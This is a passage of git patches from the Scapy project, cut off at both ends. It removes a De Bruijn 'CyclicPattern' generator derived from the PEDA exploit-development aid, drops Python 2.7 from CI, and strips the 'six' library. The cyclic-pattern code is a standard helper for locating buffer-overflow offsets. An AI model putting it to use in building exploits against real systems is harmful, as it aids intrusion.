self.p, self.n) - - -class CyclicPattern(VolatileValue[bytes]): - """ - Generate a cyclic pattern - - :param size: Size of generated pattern. Default is random size. - :param start: Start offset of the generated pattern. - :param charset_type: Charset types: - 0: basic (0-9A-Za-z) - 1: extended - 2: maximum (almost printable chars) - - - The code of this class was inspired by - - PEDA - Python Exploit Development Assistance for GDB - Copyright (C) 2012 Long Le Dinh - License: This work is licensed under a Creative Commons - Attribution-NonCommercial-ShareAlike 3.0 Unported License. - """ - - @staticmethod - def cyclic_pattern_charset(charset_type=None): - # type: (Optional[int]) -> str - """ - :param charset_type: charset type - 0: basic (0-9A-Za-z) - 1: extended (default) - 2: maximum (almost printable chars) - :return: list of charset - """ - - charset = \ - [string.ascii_uppercase, string.ascii_lowercase, string.digits] - - if charset_type == 1: # extended type - charset[1] = "%$-;" + re.sub("[sn]", "", charset[1]) - charset[2] = "sn()" + charset[2] - - if charset_type == 2: # maximum type - charset += [string.punctuation] - - return "".join( - ["".join(k) for k in zip_longest(*charset, fillvalue="")]) - - @staticmethod - def de_bruijn(charset, n, maxlen): - # type: (str, int, int) -> str - """ - Generate the De Bruijn Sequence up to `maxlen` characters - for the charset `charset` and subsequences of length `n`. - Algorithm modified from wikipedia - https://en.wikipedia.org/wiki/De_Bruijn_sequence - """ - k = len(charset) - a = [0] * k * n - sequence = [] # type: List[str] - - def db(t, p): - # type: (int, int) -> None - if len(sequence) == maxlen: - return - - if t > n: - if n % p == 0: - for j in range(1, p + 1): - sequence.append(charset[a[j]]) - if len(sequence) == maxlen: - return - else: - a[t] = a[t - p] - db(t + 1, p) - for j in range(a[t - p] + 1, k): - a[t] = j - db(t + 1, t) - - db(1, 1) - return ''.join(sequence) - - def __init__(self, size=None, start=0, charset_type=None): - # type: (Optional[int], int, Optional[int]) -> None - self.size = size if size is not None else RandNumExpo(0.01) - self.start = start - self.charset_type = charset_type - - def _command_args(self): - # type: () -> str - ret = "" - if isinstance(self.size, VolatileValue): - if self.size.lambd != 0.01 or self.size.base != 0: - ret += "size=%r" % self.size.command() - else: - ret += "size=%r" % self.size - - if self.start != 0: - ret += ", start=%r" % self.start - - if self.charset_type: - ret += ", charset_type=%r" % self.charset_type - - return ret - - def _fix(self): - # type: () -> bytes - if isinstance(self.size, VolatileValue): - size = self.size._fix() - else: - size = self.size - charset = self.cyclic_pattern_charset(self.charset_type or 0) - pattern = self.de_bruijn(charset, 3, size + self.start) - return pattern[self.start:size + self.start].encode('utf-8') diff --git a/test/random.uts b/test/random.uts index 7a445d2326e..f2cd30bd169 100644 --- a/test/random.uts +++ b/test/random.uts @@ -134,97 +134,3 @@ assert de.command() == "DelayedEval(expr='3 + 1')" v = IncrementalValue(restart=2) assert v == 0 and v == 1 and v == 2 and v == 0 assert v.command() == "IncrementalValue(restart=2)" - -= CyclicPattern charset 0 - -cs0 = b'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1AaCAacAa2AaDAadAa3AaEAaeAa4AaFAafAa5AaGAagAa6AaHAahAa7AaIAaiAa8AaJ' - -p = Raw(load=CyclicPattern()) -b = bytes(p) -if len(b): - if len(b) > len(cs0): - assert cs0 in b - else: - assert b in cs0 or b == cs0 - -p = Raw(load=CyclicPattern(5)) -b = bytes(p) -assert len(b) == 5 -assert b == b'AAAaA' - -p = Raw(load=CyclicPattern(2, 3)) -b = bytes(p) -print(b) -assert len(b) == 2 -assert b == b'aA' - -= CyclicPattern charset 1 - -cs1 = b'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%' - -p = Raw(load=CyclicPattern(None, 0, 1)) -b = bytes(p) -if len(b): - if len(b) > len(cs1): - assert cs1 in b - else: - assert b in cs1 or b == cs1 - -p = Raw(load=CyclicPattern(10, 0, 1)) -b = bytes(p) -assert len(b) == 10 -assert b == b'AAA%AAsAAB' - -p = Raw(load=CyclicPattern(2, 8, 1)) -b = bytes(p) -print(b) -assert len(b) == 2 -assert b == b'AB' - -= CyclicPattern charset 2 - -cs2 = b'AAAaAA0AA!AABAAbAA1AA"AACAAcAA2AA#AADAAdAA3AA$AAEAAeAA4AA%AAFAAfAA5AA&AAGAAgAA6AA\'AAHAAhAA7AA(AAIAAiAA8AA)AAJAAjAA9AA*AAKAAkAA+AALAAlAA,AAMAAmAA-AANAAnAA.AAOAAoAA/AAPAApAA:AAQAAqAA;AARAArAAAAUAAuAA?AAVAAvAA@AAWAAwAA[AAXAAxAA\\AAYAAyAA]AAZAAzAA^AA_AA`AA{AA|AA}AA~AaaAa0Aa!AaBAabAa1Aa"Aa' - -p = Raw(load=CyclicPattern(None, 0, 2)) -b = bytes(p) -if len(b): - if len(b) > len(cs2): - assert cs2 in b - else: - assert b in cs2 or b == cs2 - -p = Raw(load=CyclicPattern(10, 0, 2)) -b = bytes(p) -assert len(b) == 10 -assert b == b'AAAaAA0AA!' - -p = Raw(load=CyclicPattern(2, 8, 2)) -b = bytes(p) -print(b) -assert len(b) == 2 -assert b == b'A!' - -= CyclicPattern command - -p = Raw(load=CyclicPattern(2, 8, 2)) -cmd = p.command() - -assert "charset_type=2" in cmd -assert "start=8" in cmd -assert "size=2" in cmd - -p = Raw(load=CyclicPattern(2)) -cmd = p.command() - -assert "charset_type" not in cmd -assert "start" not in cmd -assert "size=2" in cmd - -p = Raw(load=CyclicPattern()) -cmd = p.command() - -assert "charset_type" not in cmd -assert "start" not in cmd -assert "size" not in cmd - - From 44c45d2637ea2808952118b5612a49d4b2efcab7 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 2 Jan 2023 13:49:03 +0100 Subject: [PATCH 0938/1632] AppVeyor - remove Python 2.7 tests --- .appveyor.yml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/.appveyor.yml b/.appveyor.yml index c7b375a906f..677f3c982c9 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -7,12 +7,6 @@ environment: # Python versions that will be tested # Note: it defines variables that can be used later matrix: - - PYTHON: "C:\\Python27-x64" - PYTHON_VERSION: "2.7.x" - PYTHON_ARCH: "64" - TOXENV: "py27-windows" - WINPCAP: "false" - UT_FLAGS: "-K scanner" - PYTHON: "C:\\Python37-x64" PYTHON_VERSION: "3.7.x" PYTHON_ARCH: "64" From 0ea948f2e7651ddfff6019a9d2833f964f8b7cfc Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 2 Jan 2023 13:49:09 +0100 Subject: [PATCH 0939/1632] GitHub Actions - remove Python 2.7 tests --- .github/workflows/unittests.yml | 26 +------------------------- 1 file changed, 1 insertion(+), 25 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index d083b19d4b2..f9f8e5cae45 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -58,8 +58,6 @@ jobs: - name: Run mypy run: tox -e mypy - # https://github.com/actions/runner-images/issues/6399 - # Python 2.7 tests must be run on ubuntu <= 20.04 utscapy: name: ${{ matrix.os }} ${{ matrix.installmode }} ${{ matrix.python }} ${{ matrix.mode }} ${{ matrix.flags }} runs-on: ${{ matrix.os }} @@ -76,19 +74,11 @@ jobs: allow-failure: ['false'] include: # Linux root tests - - os: ubuntu-20.04 - python: "2.7" - mode: root - flags: " -K scanner" - os: ubuntu-latest python: "3.10" mode: root flags: " -K scanner" # PyPy tests: root only - - os: ubuntu-20.04 - python: "pypy2.7" - mode: root - flags: " -K scanner" - os: ubuntu-latest python: "pypy3.9" mode: root @@ -99,31 +89,17 @@ jobs: mode: root installmode: 'libpcap' flags: " -K scanner" - # MacOS tests - - os: macos-12 - python: "2.7" - mode: both - flags: " -K scanner" + # macOS tests - os: macos-12 python: "3.10" mode: both flags: " -K scanner" # Scanner tests - - os: ubuntu-20.04 - python: "2.7" - mode: root - allow-failure: 'true' - flags: " -k scanner" - os: ubuntu-latest python: "3.10" mode: root allow-failure: 'true' flags: " -k scanner" - - os: ubuntu-20.04 - python: "pypy2.7" - mode: root - allow-failure: 'true' - flags: " -k scanner" - os: ubuntu-latest python: "pypy3.9" mode: root From 246ad3fecbd218e6cd57705b1b42a8a5a0714652 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Tue, 10 Jan 2023 23:41:35 +0100 Subject: [PATCH 0940/1632] Drop six library (first batch) --- scapy/ansmachine.py | 5 +- scapy/arch/bpf/core.py | 1 - scapy/arch/linux.py | 31 +-- scapy/arch/windows/__init__.py | 19 +- scapy/arch/windows/structures.py | 3 +- scapy/as_resolvers.py | 1 - scapy/asn1/asn1.py | 22 +- scapy/asn1/ber.py | 15 +- scapy/asn1/mib.py | 18 +- scapy/asn1fields.py | 11 +- scapy/asn1packet.py | 5 +- scapy/automaton.py | 47 ++-- scapy/autorun.py | 19 +- scapy/base_classes.py | 3 - scapy/compat.py | 210 +++++------------- scapy/config.py | 51 +++-- scapy/contrib/automotive/ecu.py | 3 +- scapy/contrib/automotive/gm/gmlan_scanner.py | 4 +- .../contrib/automotive/scanner/enumerator.py | 22 +- scapy/contrib/automotive/uds_scan.py | 4 +- scapy/contrib/bgp.py | 1 - scapy/contrib/cdp.py | 1 - scapy/contrib/dtp.py | 2 - scapy/contrib/eigrp.py | 1 - scapy/contrib/gtp.py | 1 - scapy/contrib/homeplugav.py | 1 - scapy/contrib/homepluggp.py | 1 - scapy/contrib/homeplugsg.py | 1 - scapy/contrib/http2.py | 2 - scapy/contrib/icmp_extensions.py | 1 - scapy/contrib/igmp.py | 1 - scapy/contrib/igmpv3.py | 1 - scapy/contrib/isis.py | 1 - scapy/contrib/ldp.py | 1 - scapy/contrib/macsec.py | 2 - scapy/contrib/openflow.py | 1 - scapy/contrib/openflow3.py | 1 - scapy/contrib/ppi_geotag.py | 1 - scapy/contrib/send.py | 1 - scapy/contrib/skinny.py | 1 - scapy/dadict.py | 2 - scapy/fields.py | 1 - scapy/layers/all.py | 1 - scapy/layers/dhcp.py | 2 - scapy/layers/dhcp6.py | 1 - scapy/layers/dns.py | 1 - scapy/layers/dot11.py | 1 - scapy/layers/eap.py | 2 - scapy/layers/http.py | 15 +- scapy/layers/inet6.py | 3 - scapy/layers/ipsec.py | 1 - scapy/layers/isakmp.py | 1 - scapy/layers/l2.py | 2 - scapy/layers/lltd.py | 1 - scapy/layers/ntp.py | 1 - scapy/layers/sctp.py | 1 - scapy/layers/snmp.py | 1 - scapy/layers/tftp.py | 1 - scapy/layers/tls/automaton_cli.py | 1 - scapy/layers/tls/automaton_srv.py | 1 - scapy/layers/tls/cert.py | 2 - scapy/layers/tls/crypto/cipher_aead.py | 1 - scapy/layers/tls/crypto/cipher_stream.py | 1 - scapy/layers/tls/crypto/compression.py | 1 - scapy/layers/tls/crypto/groups.py | 1 - scapy/layers/tls/crypto/h_mac.py | 1 - scapy/layers/tls/crypto/kx_algs.py | 1 - scapy/layers/tls/crypto/pkcs1.py | 1 - scapy/layers/tls/crypto/prf.py | 1 - scapy/layers/tls/crypto/suites.py | 1 - scapy/layers/tls/extensions.py | 1 - scapy/layers/tls/handshake.py | 1 - scapy/layers/tls/keyexchange.py | 1 - scapy/layers/tls/tools.py | 1 - scapy/layers/tuntap.py | 1 - scapy/libs/six.py | 1 - scapy/main.py | 2 - scapy/modules/nmap.py | 1 - scapy/modules/p0f.py | 2 - scapy/modules/p0fv2.py | 2 - scapy/modules/voip.py | 1 - scapy/packet.py | 2 - scapy/pipetool.py | 1 - scapy/plist.py | 4 +- scapy/pton_ntop.py | 10 +- scapy/route.py | 2 - scapy/route6.py | 1 - scapy/scapypipes.py | 1 - scapy/sendrecv.py | 1 - scapy/supersocket.py | 1 - scapy/themes.py | 4 +- scapy/tools/UTscapy.py | 1 - scapy/tools/automotive/isotpscanner.py | 1 - scapy/tools/automotive/obdscanner.py | 1 - scapy/tools/check_asdis.py | 1 - scapy/utils.py | 2 - scapy/utils6.py | 1 - scapy/volatile.py | 1 - setup.py | 7 +- test/contrib/ikev2.uts | 1 - test/fields.uts | 1 - test/nmap.uts | 1 - test/p0fv2.uts | 1 - test/regression.uts | 10 - test/scapy/layers/http.uts | 3 +- test/scapy/layers/usb.uts | 4 +- test/sendsniff.uts | 15 +- test/tls.uts | 3 - test/tls/tests_tls_netaccess.uts | 5 +- test/tools/isotpscanner.uts | 13 -- test/tools/obdscanner.uts | 28 --- 111 files changed, 204 insertions(+), 505 deletions(-) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index f823e86711b..d465cf3902f 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -21,8 +21,6 @@ from scapy.packet import Packet from scapy.plist import PacketList -import scapy.libs.six as six - from scapy.compat import ( Any, Callable, @@ -68,8 +66,7 @@ def __new__(cls, return obj -@six.add_metaclass(ReferenceAM) -class AnsweringMachine(Generic[_T]): +class AnsweringMachine(Generic[_T], metaclass=ReferenceAM): function_name = "" filter = None # type: Optional[str] sniff_options = {"store": 0} # type: Dict[str, Any] diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index ff0810f7eef..b3439892461 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -7,7 +7,6 @@ Scapy *BSD native support - core """ -from __future__ import absolute_import from ctypes import cdll, cast, pointer from ctypes import c_int, c_ulong, c_uint, c_char_p, Structure, POINTER diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 9087156c09f..68606db2f1d 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -7,8 +7,6 @@ Linux specific functions. """ -from __future__ import absolute_import - from fcntl import ioctl from select import select @@ -48,8 +46,6 @@ from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket -import scapy.libs.six as six - # Typing imports from scapy.compat import ( Any, @@ -208,7 +204,7 @@ def get_alias_address(iface_name, # type: str # Extract interfaces names out = struct.unpack("iL", ifreq)[0] - names_b = names_ar.tobytes() if six.PY3 else names_ar.tostring() # type: ignore # noqa: E501 + names_b = names_ar.tobytes() names = [names_b[i:i + offset].split(b'\0', 1)[0] for i in range(0, out, name_len)] # noqa: E501 # Look for the IP address @@ -504,21 +500,16 @@ def __init__(self, socket.SO_RCVBUF, conf.bufsize ) - if not six.PY2: - # Receive Auxiliary Data (VLAN tags) - try: - self.ins.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1) - self.ins.setsockopt( - socket.SOL_SOCKET, - SO_TIMESTAMPNS, - 1 - ) - self.auxdata_available = True - except OSError: - # Note: Auxiliary Data is only supported since - # Linux 2.6.21 - msg = "Your Linux Kernel does not support Auxiliary Data!" - log_runtime.info(msg) + # Receive Auxiliary Data (VLAN tags) + try: + self.ins.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1) + self.ins.setsockopt(socket.SOL_SOCKET, SO_TIMESTAMPNS, 1) + self.auxdata_available = True + except OSError: + # Note: Auxiliary Data is only supported since + # Linux 2.6.21 + msg = "Your Linux Kernel does not support Auxiliary Data!" + log_runtime.info(msg) if not isinstance(self, L2ListenSocket): self.outs = self.ins # type: socket.socket self.outs.setsockopt( diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index df8af008d31..ecca1bd1460 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -13,9 +13,10 @@ import socket import struct import subprocess as sp - import warnings +import winreg + from scapy.arch.windows.structures import _windows_title, \ GetAdaptersAddresses, GetIpForwardTable, GetIpForwardTable2, \ get_service_status @@ -34,8 +35,6 @@ from scapy.utils import atol, itom, mac2str, str2mac from scapy.utils6 import construct_source_candidate_set, in6_getscope from scapy.data import ARPHDR_ETHER, load_manuf -import scapy.libs.six as six -from scapy.libs.six.moves import input, winreg from scapy.compat import plain_str from scapy.supersocket import SuperSocket @@ -298,16 +297,12 @@ def _resolve_ips(y): ips.extend(_resolve_ips(multicast)) return ips - if six.PY2: - _str_decode = lambda x: x.encode('utf8', errors='ignore') - else: - _str_decode = plain_str return [ { - "name": _str_decode(x["friendly_name"]), + "name": plain_str(x["friendly_name"]), "index": x["interface_index"], - "description": _str_decode(x["description"]), - "guid": _str_decode(x["adapter_name"]), + "description": plain_str(x["description"]), + "guid": plain_str(x["adapter_name"]), "mac": _get_mac(x), "ipv4_metric": 0 if WINDOWS_XP else x["ipv4_metric"], "ipv6_metric": 0 if WINDOWS_XP else x["ipv6_metric"], @@ -623,7 +618,7 @@ def load(self, NetworkInterface_Win=NetworkInterface_Win): windows_interfaces[i['guid']] = i index = 0 - for netw, if_data in six.iteritems(conf.cache_pcapiflist): + for netw, if_data in conf.cache_pcapiflist.items(): name, ips, flags, _ = if_data guid = _pcapname_to_guid(netw) data = windows_interfaces.get(guid, None) @@ -674,7 +669,7 @@ def get_ips(v6=False): :param v6: IPv6 addresses """ res = {} - for iface in six.itervalues(conf.ifaces): + for iface in conf.ifaces.values(): if v6: res[iface] = iface.ips[6] else: diff --git a/scapy/arch/windows/structures.py b/scapy/arch/windows/structures.py index c0d2e33e493..6ca05644488 100644 --- a/scapy/arch/windows/structures.py +++ b/scapy/arch/windows/structures.py @@ -19,12 +19,13 @@ byref, create_string_buffer, ) +from socket import AddressFamily + from scapy.config import conf from scapy.consts import WINDOWS_XP # Typing imports from scapy.compat import ( - AddressFamily, Any, Dict, List, diff --git a/scapy/as_resolvers.py b/scapy/as_resolvers.py index 4f0ebb0b744..1fd007b7b88 100644 --- a/scapy/as_resolvers.py +++ b/scapy/as_resolvers.py @@ -8,7 +8,6 @@ """ -from __future__ import absolute_import import socket from scapy.config import conf from scapy.compat import plain_str diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 8054228f917..266609707cc 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -8,8 +8,6 @@ ASN.1 (Abstract Syntax Notation One) """ -from __future__ import absolute_import -from __future__ import print_function import random from datetime import datetime, timedelta, tzinfo @@ -18,7 +16,6 @@ from scapy.volatile import RandField, RandIP, GeneralizedTime from scapy.utils import Enum_metaclass, EnumElement, binrepr from scapy.compat import plain_str, bytes_encode, chb, orb -import scapy.libs.six as six from scapy.compat import ( Any, @@ -79,9 +76,7 @@ def __init__(self, objlist=None): else: self.objlist = [ x._asn1_obj - for x in six.itervalues( - ASN1_Class_UNIVERSAL.__rdict__ # type: ignore - ) + for x in ASN1_Class_UNIVERSAL.__rdict__.values() # type: ignore if hasattr(x, "_asn1_obj") ] self.chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" # noqa: E501 @@ -149,8 +144,7 @@ class ASN1_Codecs_metaclass(Enum_metaclass): element_class = ASN1Codec -@six.add_metaclass(ASN1_Codecs_metaclass) -class ASN1_Codecs: +class ASN1_Codecs(metaclass=ASN1_Codecs_metaclass): BER = cast(ASN1Codec, 1) DER = cast(ASN1Codec, 2) PER = cast(ASN1Codec, 3) @@ -215,12 +209,12 @@ def __new__(cls, ): # type: (...) -> Type[ASN1_Class] for b in bases: - for k, v in six.iteritems(b.__dict__): + for k, v in b.__dict__.items(): if k not in dct and isinstance(v, ASN1Tag): dct[k] = v.clone() rdict = {} - for k, v in six.iteritems(dct): + for k, v in dct.items(): if isinstance(v, int): v = ASN1Tag(k, v) dct[k] = v @@ -231,15 +225,14 @@ def __new__(cls, ncls = cast('Type[ASN1_Class]', type.__new__(cls, name, bases, dct)) - for v in six.itervalues(ncls.__dict__): + for v in ncls.__dict__.values(): if isinstance(v, ASN1Tag): # overwrite ASN1Tag contexts, even cloned ones v.context = ncls return ncls -@six.add_metaclass(ASN1_Class_metaclass) -class ASN1_Class: +class ASN1_Class(metaclass=ASN1_Class_metaclass): pass @@ -306,8 +299,7 @@ def __new__(cls, _K = TypeVar('_K') -@six.add_metaclass(ASN1_Object_metaclass) -class ASN1_Object(Generic[_K]): +class ASN1_Object(Generic[_K], metaclass=ASN1_Object_metaclass): tag = ASN1_Class_UNIVERSAL.ANY def __init__(self, val): diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index 5e2a8148ad1..24f28e85905 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -11,7 +11,6 @@ # Good read: https://luca.ntop.org/Teaching/Appunti/asn1.html -from __future__ import absolute_import from scapy.error import warning from scapy.compat import chb, orb, bytes_encode from scapy.utils import binrepr, inet_aton, inet_ntoa @@ -28,7 +27,6 @@ ASN1_Object, _ASN1_ERROR, ) -from scapy.libs import six from scapy.compat import ( Any, @@ -284,8 +282,7 @@ def __new__(cls, _K = TypeVar('_K') -@six.add_metaclass(BERcodec_metaclass) -class BERcodec_Object(Generic[_K]): +class BERcodec_Object(Generic[_K], metaclass=BERcodec_metaclass): codec = ASN1_Codecs.BER tag = ASN1_Class_UNIVERSAL.ANY @@ -346,13 +343,13 @@ def do_dec(cls, _context = cls.tag.context cls.check_string(s) p, remainder = BER_id_dec(s) - if p not in _context: # type: ignore + if p not in _context: t = s if len(t) > 18: t = t[:15] + b"..." raise BER_Decoding_Error("Unknown prefix [%02x] for [%r]" % (p, t), remaining=s) - tag = _context[p] # type: ignore + tag = _context[p] codec = cast('Type[BERcodec_Object[_K]]', tag.get_codec(ASN1_Codecs.BER)) if codec == BERcodec_Object: @@ -393,7 +390,7 @@ def safedec(cls, @classmethod def enc(cls, s): # type: (_K) -> bytes - if isinstance(s, six.string_types + (bytes,)): + if isinstance(s, (str, bytes)): return BERcodec_STRING.enc(s) else: try: @@ -504,7 +501,7 @@ class BERcodec_STRING(BERcodec_Object[str]): @classmethod def enc(cls, _s): - # type: (str) -> bytes + # type: (Union[str, bytes]) -> bytes s = bytes_encode(_s) # Be sure we are encoding bytes return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s @@ -673,7 +670,7 @@ class BERcodec_IPADDRESS(BERcodec_STRING): tag = ASN1_Class_UNIVERSAL.IPADDRESS @classmethod - def enc(cls, ipaddr_ascii): + def enc(cls, ipaddr_ascii): # type: ignore # type: (str) -> bytes try: s = inet_aton(ipaddr_ascii) diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index e3d23a5442c..ea1d6ee2870 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -8,13 +8,11 @@ Management Information Base (MIB) parsing """ -from __future__ import absolute_import import re from glob import glob from scapy.dadict import DADict, fixname from scapy.config import conf from scapy.utils import do_graph -import scapy.libs.six as six from scapy.compat import plain_str from scapy.compat import ( @@ -48,7 +46,7 @@ def _findroot(self, x): max = 0 root = "." root_key = "" - for k in six.iterkeys(self): + for k in self: if x.startswith(k + "."): if max < len(k): max = len(k) @@ -69,9 +67,9 @@ def _oid(self, x): p = len(xl) - 1 while p >= 0 and _mib_re_integer.match(xl[p]): p -= 1 - if p != 0 or xl[p] not in six.itervalues(self.d): + if p != 0 or xl[p] not in self.d.values(): return x - xl[p] = next(k for k, v in six.iteritems(self.d) if v == xl[p]) + xl[p] = next(k for k, v in self.d.items() if v == xl[p]) return ".".join(xl[p:]) def _make_graph(self, other_keys=None, **kargs): @@ -164,7 +162,7 @@ def load_mib(filenames): unresolved = {} # type: Dict[str, List[str]] alias = {} # type: Dict[str, str] # Export the current MIB to a working dictionary - for k in six.iterkeys(conf.mib): + for k in conf.mib: _mib_register(conf.mib[k], k.split("."), the_mib, unresolved, alias) # Read the files @@ -193,14 +191,14 @@ def load_mib(filenames): # Create the new MIB newmib = MIBDict(_name="MIB") # Add resolved values - for oid, key in six.iteritems(the_mib): + for oid, key in the_mib.items(): newmib[".".join(key)] = oid # Add unresolved values - for oid, key in six.iteritems(unresolved): + for oid, key in unresolved.items(): newmib[".".join(key)] = oid # Add aliases - for key, oid in six.iteritems(alias): - newmib[key] = oid + for key_s, oid in alias.items(): + newmib[key_s] = oid conf.mib = newmib diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 2efcaf551f9..7e36b6f6037 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -41,7 +41,6 @@ ) from scapy import packet -import scapy.libs.six as six from scapy.compat import ( Any, @@ -275,7 +274,7 @@ def __init__(self, keys = range(len(enum)) else: keys = list(enum) - if any(isinstance(x, six.string_types) for x in keys): + if any(isinstance(x, str) for x in keys): i2s, s2i = s2i, i2s # type: ignore for k in keys: i2s[k] = enum[k] @@ -691,7 +690,7 @@ def __init__(self, name, default, *args, **kwargs): # should be ASN1_Packet if hasattr(p.ASN1_root, "choices"): root = cast(ASN1F_CHOICE, p.ASN1_root) - for k, v in six.iteritems(root.choices): + for k, v in root.choices.items(): # ASN1F_CHOICE recursion self.choices[k] = v else: @@ -761,14 +760,14 @@ def i2m(self, pkt, x): def randval(self): # type: () -> RandChoice randchoices = [] - for p in six.itervalues(self.choices): + for p in self.choices.values(): if hasattr(p, "ASN1_root"): # should be ASN1_Packet class - randchoices.append(packet.fuzz(p())) + randchoices.append(packet.fuzz(p())) # type: ignore elif hasattr(p, "ASN1_tag"): if isinstance(p, type): # should be (basic) ASN1F_field class - randchoices.append(p("dummy", None).randval()) + randchoices.append(p("dummy", None).randval()) # type: ignore else: # should be ASN1F_PACKET instance randchoices.append(p.randval()) diff --git a/scapy/asn1packet.py b/scapy/asn1packet.py index 36943fb5f89..0ca1d0f0117 100644 --- a/scapy/asn1packet.py +++ b/scapy/asn1packet.py @@ -9,10 +9,8 @@ Packet holding data in Abstract Syntax Notation (ASN.1). """ -from __future__ import absolute_import from scapy.base_classes import Packet_metaclass from scapy.packet import Packet -import scapy.libs.six as six from scapy.compat import ( Any, @@ -39,8 +37,7 @@ def __new__(cls, return super(ASN1Packet_metaclass, cls).__new__(cls, name, bases, dct) -@six.add_metaclass(ASN1Packet_metaclass) -class ASN1_Packet(Packet): +class ASN1_Packet(Packet, metaclass=ASN1Packet_metaclass): ASN1_root = cast('ASN1F_field[Any, Any]', None) ASN1_codec = None diff --git a/scapy/automaton.py b/scapy/automaton.py index 41f513fcd13..87919a085c8 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -33,7 +33,6 @@ from scapy.supersocket import SuperSocket from scapy.packet import Packet from scapy.consts import WINDOWS -import scapy.libs.six as six from scapy.compat import ( Any, @@ -135,8 +134,7 @@ def select_objects(inputs, remain): _T = TypeVar("_T") -@six.add_metaclass(_Generic_metaclass) -class ObjectPipe(Generic[_T]): +class ObjectPipe(Generic[_T], metaclass=_Generic_metaclass): def __init__(self, name=None): # type: (Optional[str]) -> None self.name = name or "ObjectPipe" @@ -260,9 +258,11 @@ def __init__(self, **args): def __repr__(self): # type: () -> str - return "" % " ".join("%s=%r" % (k, v) - for (k, v) in six.iteritems(self.__dict__) # noqa: E501 - if not k.startswith("_")) + return "" % " ".join( + "%s=%r" % (k, v) + for k, v in self.__dict__.items() + if not k.startswith("_") + ) class Timer(): @@ -694,11 +694,11 @@ def __new__(cls, name, bases, dct): while classes: c = classes.pop(0) # order is important to avoid breaking method overloading # noqa: E501 classes += list(c.__bases__) - for k, v in six.iteritems(c.__dict__): + for k, v in c.__dict__.items(): if k not in members: members[k] = v - decorated = [v for v in six.itervalues(members) + decorated = [v for v in members.values() if hasattr(v, "atmt_type")] for m in decorated: @@ -732,11 +732,13 @@ def __new__(cls, name, bases, dct): for co in m.atmt_cond: cls.actions[co].append(m) - for v in itertools.chain(six.itervalues(cls.conditions), - six.itervalues(cls.recv_conditions), - six.itervalues(cls.ioevents)): + for v in itertools.chain( + cls.conditions.values(), + cls.recv_conditions.values(), + cls.ioevents.values() + ): v.sort(key=lambda x: x.atmt_prio) - for condname, actlst in six.iteritems(cls.actions): + for condname, actlst in cls.actions.items(): actlst.sort(key=lambda x: x.atmt_cond[condname]) for ioev in cls.iosupersockets: @@ -760,7 +762,7 @@ def build_graph(self): s = 'digraph "%s" {\n' % self.__class__.__name__ se = "" # Keep initial nodes at the beginning for better rendering - for st in six.itervalues(self.states): + for st in self.states.values(): if st.atmt_initial: se = ('\t"%s" [ style=filled, fillcolor=blue, shape=box, root=true];\n' % st.atmt_state) + se # noqa: E501 elif st.atmt_final: @@ -771,7 +773,7 @@ def build_graph(self): se += '\t"%s" [ style=filled, fillcolor=orange, shape=box, root=true ];\n' % st.atmt_state # noqa: E501 s += se - for st in six.itervalues(self.states): + for st in self.states.values(): for n in st.atmt_origfunc.__code__.co_names + st.atmt_origfunc.__code__.co_consts: # noqa: E501 if n in self.states: s += '\t"%s" -> "%s" [ color=green ];\n' % (st.atmt_state, n) # noqa: E501 @@ -786,7 +788,7 @@ def build_graph(self): for x in self.actions[f.atmt_condname]: line += "\\l>[%s]" % x.__name__ s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501 - for k, timers in six.iteritems(self.timeout): + for k, timers in self.timeout.items(): for timer in timers: for n in (timer._func.__code__.co_names + timer._func.__code__.co_consts): @@ -805,8 +807,7 @@ def graph(self, **kargs): return do_graph(s, **kargs) -@six.add_metaclass(Automaton_metaclass) -class Automaton: +class Automaton(metaclass=Automaton_metaclass): states = {} # type: Dict[str, _StateWrapper] state = None # type: ATMT.NewStateRequested recv_conditions 